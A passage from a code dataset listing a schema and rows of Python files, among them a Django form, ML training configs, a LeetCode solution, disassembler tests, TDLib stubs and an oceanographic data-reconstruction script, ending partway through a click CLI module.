blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0640154e6d006f7e8cd5a8a84feb4397adea1e62
|
3dbb38734200935f143ea8b6446e9bf32a4a16ee
|
/PyClient/TableOfLife/app/forms.py
|
2f670b63694db308562266cdc27f51cebb639723
|
[] |
no_license
|
k-t-l-h/TableOfLife
|
4624938a2edff3b5de336c30fec5775a5e3971cf
|
f0ceefe499b9a5a76b9f15201cbd409fa75f0605
|
refs/heads/main
| 2023-05-14T09:39:37.406622
| 2021-06-03T19:35:43
| 2021-06-03T19:35:43
| 345,408,827
| 0
| 2
| null | 2023-02-17T18:58:24
| 2021-03-07T17:26:42
|
C++
|
UTF-8
|
Python
| false
| false
| 1,125
|
py
|
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.contrib.auth.models import User
from django.core import validators
from django import forms
import re
class AskForm(forms.Form):
classes = forms.CharField(label='О предметах:', widget=forms.Textarea(
attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Название предмета, Имя преподавателя, Количество студентов'}))
students = forms.CharField(label='Выбор учеников:', widget=forms.Textarea(
attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Матрица оценок'}))
settings = forms.CharField(label='Настройка (только для продвинутых): crossover, mutation, selector, creator', widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Указывайте через запятую'}))
class PostForm(forms.Form):
uuid = forms.CharField(label='Ваш UUID:', widget=forms.TextInput(
attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'UUID'}))
|
[
"you@example.com"
] |
you@example.com
|
4b019b306236babfdf442ed4b7f1e6d0ebb21614
|
ae8a89e90b4d69a061076563ba68272d27e5c664
|
/HIDS/main.py
|
a75779d5ec65158a8c28c296ca08fbb8d7b57269
|
[] |
no_license
|
Louis-Saglio/python_script
|
8d1a65f704c21eb3b2fee17e63b8d2b467764bb0
|
f039e61078f5eb18d3334c4940d794fa5bc5f67d
|
refs/heads/master
| 2022-12-21T21:37:07.234976
| 2017-10-29T15:52:47
| 2017-10-29T15:52:47
| 106,963,199
| 0
| 1
| null | 2022-12-09T03:22:11
| 2017-10-14T21:11:03
|
Python
|
UTF-8
|
Python
| false
| false
| 255
|
py
|
import filecmp
import os
def rlistdir(path='.'):
for directory, sub_dir, files in os.walk(path):
for file in files:
yield os.path.join(directory, file)
if __name__ == '__main__':
for i in rlistdir('/usr'):
print(i)
|
[
"louis.saglio@sfr.fr"
] |
louis.saglio@sfr.fr
|
bcfaee049701f0696da3a47ef641b699bbe4b7cd
|
c5f58af61e3577ded52acda210f4f664651b598c
|
/template/mmdetection/configs/foveabox/fovea_r50_fpn_4x4_1x_coco.py
|
2b00ad2faf61e2c437b5237d9de02049a81edf57
|
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
hojihun5516/object-detection-level2-cv-02
|
0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac
|
bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109
|
refs/heads/master
| 2023-08-31T09:50:59.150971
| 2021-10-16T15:00:19
| 2021-10-16T15:00:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,528
|
py
|
_base_ = ["../_base_/datasets/coco_detection.py", "../_base_/schedules/schedule_1x.py", "../_base_/default_runtime.py"]
# model settings
model = dict(
type="FOVEA",
backbone=dict(
type="ResNet",
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type="BN", requires_grad=True),
norm_eval=True,
style="pytorch",
init_cfg=dict(type="Pretrained", checkpoint="torchvision://resnet50"),
),
neck=dict(
type="FPN",
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
num_outs=5,
add_extra_convs="on_input",
),
bbox_head=dict(
type="FoveaHead",
num_classes=80,
in_channels=256,
stacked_convs=4,
feat_channels=256,
strides=[8, 16, 32, 64, 128],
base_edge_list=[16, 32, 64, 128, 256],
scale_ranges=((1, 64), (32, 128), (64, 256), (128, 512), (256, 2048)),
sigma=0.4,
with_deform=False,
loss_cls=dict(type="FocalLoss", use_sigmoid=True, gamma=1.50, alpha=0.4, loss_weight=1.0),
loss_bbox=dict(type="SmoothL1Loss", beta=0.11, loss_weight=1.0),
),
# training and testing settings
train_cfg=dict(),
test_cfg=dict(nms_pre=1000, score_thr=0.05, nms=dict(type="nms", iou_threshold=0.5), max_per_img=100),
)
data = dict(samples_per_gpu=4, workers_per_gpu=4)
# optimizer
optimizer = dict(type="SGD", lr=0.01, momentum=0.9, weight_decay=0.0001)
|
[
"hojihun5516@daum.net"
] |
hojihun5516@daum.net
|
6357de8a8bbeccf5484ff2c1b1e34b8452d63ff4
|
8a12d939f01a179c1fb8b7e72d8cb1c7d4970b6f
|
/tools/train.py
|
ebc65480c5fc9610caee60b39c0eafdd4661cecf
|
[
"Apache-2.0"
] |
permissive
|
459737087/mmflow
|
bebd2da1bd87e9b5b2a1a10ecdc61558978610d9
|
a32f7af12f1a0d2ae3f962f4c94a4a1680c7a19e
|
refs/heads/master
| 2023-09-03T03:04:40.010033
| 2021-11-18T04:35:06
| 2021-11-18T04:35:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,433
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
import argparse
import copy
import os
import os.path as osp
import time
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import init_dist
from mmcv.utils import get_git_hash
from mmflow import __version__
from mmflow.apis import set_random_seed, train_model
from mmflow.datasets import build_dataset
from mmflow.models import build_flow_estimator
from mmflow.utils import collect_env, get_root_logger
def parse_args():
parser = argparse.ArgumentParser(description='Train a flow estimator')
parser.add_argument('config', help='train config file path')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--load-from', help='the checkpoint file to load weights from')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int,
help='number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='ids of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=None, help='random seed')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > config > default filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.load_from is not None:
cfg.load_from = args.load_from
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids
else:
cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
logger = get_root_logger(log_file=log_file, log_level=cfg.log_level)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([f'{k}: {v}' for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
if args.seed is not None:
logger.info(f'Set random seed to {args.seed}, deterministic: '
f'{args.deterministic}')
set_random_seed(args.seed, deterministic=args.deterministic)
cfg.seed = args.seed
meta['seed'] = args.seed
meta['exp_name'] = osp.basename(args.config)
model = build_flow_estimator(cfg.model)
model.init_weights()
logger.info(model)
if cfg.data.train_dataloader.get('sample_ratio') is None:
# build_dataset will concat the list of dataset
# so there is one dataset in the list
datasets = [build_dataset(cfg.data.train)]
else:
# the list of datasets is for Mixbatch
datasets = [[build_dataset(c) for c in cfg.data.train]]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
val_dataset.pipeline = cfg.data.train.pipeline
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmflow version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmflow_version=f'{__version__}+{get_git_hash()[:7]}',
config=cfg.pretty_text)
# add an attribute for visualization convenience
datasets_size = 0
for ds in datasets:
datasets_size += len(ds)
logger.info(f'dataset size {datasets_size}')
train_model(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
main()
|
[
"meowzheng@outlook.com"
] |
meowzheng@outlook.com
|
73575c45ed55b4146558350ddb50d28b66091187
|
8ef5a09d76a11c56963f18e6a08474a1a8bafe3c
|
/leet_code/18. 4Sum.py
|
972245f09f2573fa6cc14283b372bbd0b6f022b4
|
[] |
no_license
|
roiei/algo
|
32c4677649c7666db148f6183fbfbf66c8b1969f
|
ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec
|
refs/heads/master
| 2022-04-01T19:21:27.768675
| 2022-02-19T06:15:29
| 2022-02-19T06:15:29
| 169,021,154
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,124
|
py
|
import time
from util.util_list import *
from util.util_tree import *
import copy
import collections
import bisect
class Solution:
def fourSum(self, nums: [int], target: int) -> [[int]]:
n = len(nums)
res = set()
nums.sort()
for i in range(n - 2):
for j in range(i + 1, n - 2):
l = j + 1
r = n - 1
acc = nums[i] + nums[j]
diff = target - acc
while l < r:
sum = nums[l] + nums[r]
if sum == diff:
res.add((nums[i], nums[j], nums[l], nums[r],))
l += 1
r -= 1
continue
if sum > diff:
r -= 1
elif sum < diff:
l += 1
return res
stime = time.time()
print([
[-1, 0, 0, 1],
[-2, -1, 1, 2],
[-2, 0, 0, 2]
] == Solution().fourSum([1, 0, -1, 0, -2, 2], 0))
print('elapse time: {} sec'.format(time.time() - stime))
|
[
"hyoukjea.son@hyundai.com"
] |
hyoukjea.son@hyundai.com
|
e8f99e195a00a7eb686066deabd7198bdbd95ded
|
0db97db08743783019efe022190f409d22ff95bd
|
/aliyun/api/rest/Cdn20141111DescribeCdnMonitorDataRequest.py
|
589fb0bb77c88eb908d460a95e93610af5c76c7d
|
[
"Apache-2.0"
] |
permissive
|
snowyxx/aliyun-python-demo
|
8052e2a165f1b869affe632dda484d6ca203bd9b
|
ed40887ddff440b85b77f9b2a1fcda11cca55c8b
|
refs/heads/master
| 2021-01-10T03:37:31.657793
| 2016-01-21T02:03:14
| 2016-01-21T02:03:14
| 49,921,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
'''
Created by auto_sdk on 2014.11.27
'''
from aliyun.api.base import RestApi
class Cdn20141111DescribeCdnMonitorDataRequest(RestApi):
def __init__(self,domain='cdn.aliyuncs.com',port=80):
RestApi.__init__(self,domain, port)
self.DomainName = None
self.EndTime = None
self.StartTime = None
def getapiname(self):
return 'cdn.aliyuncs.com.DescribeCdnMonitorData.2014-11-11'
|
[
"snowyxx@126.com"
] |
snowyxx@126.com
|
0f787c236ec1a8d885a4ef087fc082373227c8bc
|
7f523c407d45d116860eff67f079e807f2b53339
|
/src/third_party/beaengine/tests/0fc0.py
|
0ac3b3878d9ad1a76c66fa1cc72d3a95f77ed24d
|
[
"LGPL-3.0-only",
"LGPL-2.0-or-later",
"MIT"
] |
permissive
|
0vercl0k/rp
|
a352c96bfe3715eb9ce8c5942831123e65289dac
|
b24e7f58a594aaf0ce3771745bf06862f6ecc074
|
refs/heads/master
| 2023-08-30T08:03:14.842828
| 2023-08-09T00:41:00
| 2023-08-09T00:41:00
| 3,554,173
| 1,557
| 239
|
MIT
| 2023-08-09T00:41:02
| 2012-02-26T19:26:33
|
C++
|
UTF-8
|
Python
| false
| false
| 2,280
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : beaengine@gmail.com
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
def test(self):
# 0F c0 /r
# XADD r/m8, r8
Buffer = bytes.fromhex('0fc09011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.repr(), 'xadd byte ptr [rax+44332211h], dl')
assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE)
assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE)
# REX + 0F C0 /r
# XADD r/m8*, r8*
Buffer = bytes.fromhex('410fc09011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE)
assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE)
assert_equal(myDisasm.repr(), 'xadd byte ptr [r8+44332211h], dl')
# if LOCK and destination is not memory
Buffer = bytes.fromhex('f00fc0c011223344')
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
assert_equal(myDisasm.repr(), 'lock xadd al, al')
assert_equal(myDisasm.infos.Reserved_.ERROR_OPCODE, UD_)
|
[
"noreply@github.com"
] |
0vercl0k.noreply@github.com
|
99987cf070bb316131b7d0ea14e3388a616f9a15
|
20be441085d9a9ae41dcf8e4dd5f416bcd3f22da
|
/botapi/type_cast.py
|
ad3483bde31f98a71ed76a913e083021fa977960
|
[
"Apache-2.0"
] |
permissive
|
santarovich/botapi
|
928aaf48c44167b6893c51df738b9dc50873073a
|
dfb5161be08d0c045d70e023842144c4a18e012c
|
refs/heads/master
| 2023-03-16T10:51:00.997084
| 2020-12-22T09:33:44
| 2020-12-22T09:33:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,052
|
py
|
from datetime import datetime
from typing import Any
from .exceptions import TypeCastException
from .serialize import SerializableModel
from .types import TypedList, DateTime
def type_cast(func):
def wrapper(var_name: str, value: Any, *args, **kwargs):
if value is None:
return None
return func(var_name, value, *args, **kwargs)
return wrapper
class TypeCast:
@staticmethod
@type_cast
def cast(var_name: str, value: Any, var_type: Any = None, *args, **kwargs) -> Any:
"""
Casts the value to the new_type. If new_type is TypedList, casts every
item of value to item_type if item_type is not None
:param var_name: name of the attribute (used to raise errors)
:param value: value to cast
:param var_type: desired type
:return: casted value
"""
if var_type is None or isinstance(value, var_type):
return value
elif issubclass(var_type, SerializableModel) and isinstance(value, dict):
return var_type(**value)
elif issubclass(var_type, datetime) and type(value) == str:
return datetime.fromisoformat(value)
else:
raise TypeCastException(var_name, value, var_type)
@staticmethod
@type_cast
def datetime_cast(var_name, value, date_format: str = None, *args, **kwargs):
"""Returns DateTime casted from value
:param var_name: name of the attribute (used to raise errors)
:param value: str or datetime object
:param date_format: str with date format
:return: DateTime
"""
if type(value) == str:
if date_format is None:
result = DateTime.fromisoformat(value)
else:
result = DateTime.strptime(value, date_format)
elif type(value) == DateTime:
result = value
elif isinstance(value, datetime):
result = DateTime(
value.year,
value.month,
value.day,
value.hour,
value.minute,
value.second,
value.microsecond,
value.tzinfo
)
else:
raise TypeCastException(var_name, value, DateTime)
result.set_format(date_format=date_format)
return result
@staticmethod
@type_cast
def typed_list_cast(var_name, value, item_type=None, *args, **kwargs) -> TypedList:
"""Returns TypedList with type casted items
:param var_name: name of the attribute (used to raise errors)
:param value: iterable to cast
:param item_type: type of EVERY item
:return: TypedList
"""
if item_type is None:
return TypedList(value, None)
elif issubclass(item_type, SerializableModel):
return TypedList([
TypeCast.cast(var_name, item, item_type) for item in value
], item_type)
else:
return TypedList(value, item_type)
|
[
"rineisky@gmail.com"
] |
rineisky@gmail.com
|
f7503c9a867b753e4c09c2fade37efbef3ea46d8
|
9c73eccb0f27ee98452864e6388802e1c0a9e51c
|
/py_tdlib/constructors/stickers.py
|
4e1794bd2471db1a883cd9ab46fffe75f0da5e8d
|
[
"MIT"
] |
permissive
|
Tempah28/python-tdlib
|
32a684cba6f5b8fcd5673d01a06f926304d29c5b
|
925781f2ef9e386dab437334048c798fa9cb945f
|
refs/heads/master
| 2020-03-31T00:16:06.943269
| 2018-10-05T14:16:12
| 2018-10-05T14:16:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,549
|
py
|
from ..factory import Method, Type
class stickers(Type):
# a list of stickers @stickers List of stickers
stickers = None # type: "vector<sticker>"
class getStickers(Method):
# stickers from the installed sticker sets that correspond to
# given emoji. If the emoji is not empty, favorite
# recently used stickers may also be returned @emoji String
# of emoji. If empty, returns all known installed stickers
# Maximum number of stickers to be returned
emoji = None # type: "string"
limit = None # type: "int32"
class searchStickers(Method):
# for stickers from public sticker sets that correspond to
# given emoji @emoji String representation of emoji; must be
# @limit Maximum number of stickers to be returned
emoji = None # type: "string"
limit = None # type: "int32"
class getRecentStickers(Method):
# a list of recently used stickers @is_attached Pass true
# return stickers and masks that were recently attached to
# or video files; pass false to return recently sent
is_attached = None # type: "Bool"
class addRecentSticker(Method):
# adds a new sticker to the list of recently
# stickers. The new sticker is added to the top
# the list. If the sticker was already in the
# it is removed from the list first. Only stickers
# to a sticker set can be added to this
is_attached = None # type: "Bool"
sticker = None # type: "InputFile"
class getFavoriteStickers(Method):
# favorite stickers
pass
|
[
"andrew@localhost"
] |
andrew@localhost
|
159c3758b380920b7b9c253c437fa4ad4939b8f9
|
e8e4bb89c6ce57c038de445091ddebc1c1b6eb26
|
/DataProcessing_1418merged/CF1_merged_reconstruction.py
|
207351cab222fb8c1799a14ab3f481dc095780f2
|
[] |
no_license
|
ilebras/OSNAP
|
dc7fba846f866ec64edab35a278d2ce6c86e5f97
|
a5b22026351d2eb8dc4c89e2949be97122936d23
|
refs/heads/master
| 2021-05-12T16:46:18.955345
| 2020-09-08T23:04:23
| 2020-09-08T23:04:23
| 117,025,921
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,880
|
py
|
from firstfuncs_1618 import *
dat16=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_2016recovery_dailymerged.nc')
dat16_recon=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_recon_2016recovery_dailymerged.nc')
dat18=xr.open_dataset(datadir+'OSNAP2018recovery/mcat_nc/CF1_2018recovery_dailymerged.nc')
def plot_overview(dat1,dat2):
f,[ax1,ax2,ax3]=subplots(3,1,figsize=(12,15),sharex=True)
ax1.plot(dat1.TIME,dat1.PRES)
ax1.plot(dat2.TIME,dat2.PRES)
ax1.invert_yaxis()
ax1.set_ylabel('pressure [db]')
ax2.plot(dat1.TIME,dat1.PTMP)
ax2.plot(dat2.TIME,dat2.PTMP)
ax2.set_ylabel('pot. temperature [$^\circ$C]')
ax3.plot(dat1.TIME,dat1.PSAL)
ax3.plot(dat2.TIME,dat2.PSAL)
ax3.set_ylabel('practical salinity []')
plot_overview(dat16_recon,dat18)
savefig(figdir+'merging_overview/CF1_overview_16recon_w18.png')
def TSplot(dat1,dat2):
figure(figsize=(9,8))
plot(dat1.PSAL,dat1.PTMP,'o',alpha=0.3)
plot(dat2.PSAL,dat2.PTMP,'o',alpha=0.3)
xlabel('practical salinity []')
ylabel('pot. temperature [$^\circ$C]')
TSplot(dat16_recon,dat18)
savefig(figdir+'merging_overview/CF1_TS_16recon_w18.png')
#############################################################################
############ The first deployment reconstruction does not look bad,
####### Going to leave as is and try something similar for the second deployment
#############################################################################
# I actually only have to reconstruct the 50dbar data.
def plot_diff_manyways(axx,thediff,colch,labch):
axx.plot(dat18.TIME,thediff,label='',alpha=0.5,color=colch)
axx.plot(dat18.resample(TIME='1M').mean(dim='TIME').TIME,thediff.resample(TIME='1M').mean(dim='TIME'),'o-',color=colch,linewidth=3,label=labch)
axx.axhline(mean(thediff),color=colch)
#############################################################################
############ Reconstruct using both instruments, see how well they agree
##### Use same method as first deployment: constant t offset, monthly s offset
#############################################################################
mtime=(dat18).resample(TIME='1M').mean(dim='TIME').TIME
sal_mdiff={}
sal_mdiff['from100']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100)).resample(TIME='1M').mean(dim='TIME')
sal_mdiff['from200']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200)).resample(TIME='1M').mean(dim='TIME')
sal_mdiff_fill_100=linspace(sal_mdiff['from100'][8],sal_mdiff['from100'][0],5)
sal_mdiff_fill_200=linspace(sal_mdiff['from200'][8],sal_mdiff['from200'][0],5)
sal_mdiff_int={}
sal_mdiff_int['from100']=hstack((sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:2]))
sal_mdiff_int['from200']=hstack((sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:2]))
# Plot the difference between 50db instrument temp and sal with the two other instruments.
def plot_saltmp_diff():
f,[ax1,ax2]=subplots(2,1,figsize=(12,10),sharex=True)
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100),'C0','50m-100m')
ax1.plot(mtime,sal_mdiff_int['from100'],'o-',color='C0')
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200),'C1','50m-200m')
ax1.plot(mtime,sal_mdiff_int['from200'],'o-',color='C1')
plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=100)-dat18.PSAL.sel(DEPTH=200),'C2','100m-200m')
ax1.axhline(0,color='k')
ax1.legend()
ax1.set_ylabel('salinity difference')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100),'C0','50m-100m')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200),'C1','50m-200m')
plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=100)-dat18.PTMP.sel(DEPTH=200),'C2','100m-200m')
ax2.axhline(0,color='k')
ax2.set_ylabel('temperature difference')
plot_saltmp_diff()
savefig(figdir+'merging_overview/CF1_saltmpdiff.png')
ptmp_r50={}
ptmp_r50['from100']=dat18.PTMP.sel(DEPTH=100)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100))
ptmp_r50['from200']=dat18.PTMP.sel(DEPTH=200)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200))
def toTimestamp(d):
return calendar.timegm(d.timetuple())
def to_datetime_andordinal(date):
"""
Converts a numpy datetime64 object to a python datetime object
Input:
date - a np.datetime64 object
Output:
DATE - a python datetime object
"""
timestamp = ((date - np.datetime64('1970-01-01T00:00:00'))
/ np.timedelta64(1, 's'))
dtimeobj=datetime.datetime.utcfromtimestamp(timestamp)
return datetime.datetime.toordinal(dtimeobj)
time_month=[to_datetime_andordinal(ddd) for ddd in mtime.values]
time_all=[to_datetime_andordinal(ddd) for ddd in dat18.TIME.values]
f100=interp1d(time_month,sal_mdiff_int['from100'],bounds_error=False)
f200=interp1d(time_month,sal_mdiff_int['from200'],bounds_error=False)
sal_mdiff_fulltime={}
sal_mdiff_fulltime['from100']=f100(time_all)
sal_mdiff_fulltime['from200']=f200(time_all)
psal_r50={}
psal_r50['from100']=dat18.PSAL.sel(DEPTH=100)+sal_mdiff_fulltime['from100']
psal_r50['from200']=dat18.PSAL.sel(DEPTH=200)+sal_mdiff_fulltime['from200']
def comp_from100200():
f,[ax1,ax2]=subplots(2,1,figsize=(12,10))
ptmp_r50['from100'].plot(ax=ax1,label='from 100m')
ptmp_r50['from200'].plot(ax=ax1,label='from 200m')
dat18.PTMP.sel(DEPTH=50).plot(ax=ax1,label='directly measured')
ax1.legend()
ax1.set_title('')
psal_r50['from100'].plot(ax=ax2,label='from 100m')
psal_r50['from200'].plot(ax=ax2,label='from 200m')
dat18.PSAL.sel(DEPTH=50).plot(ax=ax2,label='directly measured')
ax2.set_title('')
comp_from100200()
###############################################################################
##### Save a reconstructed product which keeps recorder 50m data
#### And adds the 100m reconstruction beyond that
#### This is simply because the 100m is present,closer and noisier
#### It wouldn't make sense for 50m instrument to have less variability
################################################################################
dat18_recon=dat18.copy()
dat18_recon['PSAL'].sel(DEPTH=50)[isnan(dat18['PSAL'].sel(DEPTH=50))]=psal_r50['from100'][isnan(dat18['PSAL'].sel(DEPTH=50))].values
dat18_recon['PTMP'].sel(DEPTH=50)[isnan(dat18['PTMP'].sel(DEPTH=50))]=ptmp_r50['from100'][isnan(dat18['PTMP'].sel(DEPTH=50))].values
dat18_recon['PRES'].sel(DEPTH=50)[isnan(dat18['PRES'].sel(DEPTH=50))]=mean(dat18['PRES'].sel(DEPTH=50))
plot(dat18_recon['PRES']);
plot_overview(dat16_recon,dat18_recon)
savefig(figdir+'merging_overview/CF1_overview_1618recon.png')
dat18_recon.to_netcdf(datadir+'OSNAP2018recovery/mcat_nc/CF1_mcat_recon_2018recovery_daily.nc','w',format='netCDF4')
|
[
"isabela.lebras@gmail.com"
] |
isabela.lebras@gmail.com
|
0564a1a72dcfd96a4e5f97d467c399d260cf2044
|
6ba8a0ebb55fee0406da9e4c6784def6391cf61b
|
/pyartcd/pyartcd/cli.py
|
62569db660eb11953ff60867489214cead41a104
|
[
"Apache-2.0"
] |
permissive
|
gabemontero/aos-cd-jobs
|
a354d680250bf306a90a24ec5023cf203658df59
|
0208570f5bf14d6f9672da84b0edb6cffaaded92
|
refs/heads/master
| 2021-09-28T04:57:13.789002
| 2021-09-21T09:18:05
| 2021-09-21T09:18:05
| 96,802,806
| 0
| 0
| null | 2017-07-10T17:17:20
| 2017-07-10T17:17:20
| null |
UTF-8
|
Python
| false
| false
| 2,047
|
py
|
import asyncio
from functools import update_wrapper
import logging
from pathlib import Path
from typing import Optional
import click
from pyartcd.runtime import Runtime
pass_runtime = click.make_pass_decorator(Runtime)
def click_coroutine(f):
""" A wrapper to allow to use asyncio with click.
https://github.com/pallets/click/issues/85
"""
f = asyncio.coroutine(f)
def wrapper(*args, **kwargs):
loop = asyncio.get_event_loop()
return loop.run_until_complete(f(*args, **kwargs))
return update_wrapper(wrapper, f)
# ============================================================================
# GLOBAL OPTIONS: parameters for all commands
# ============================================================================
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.option("--config", "-c", metavar='PATH',
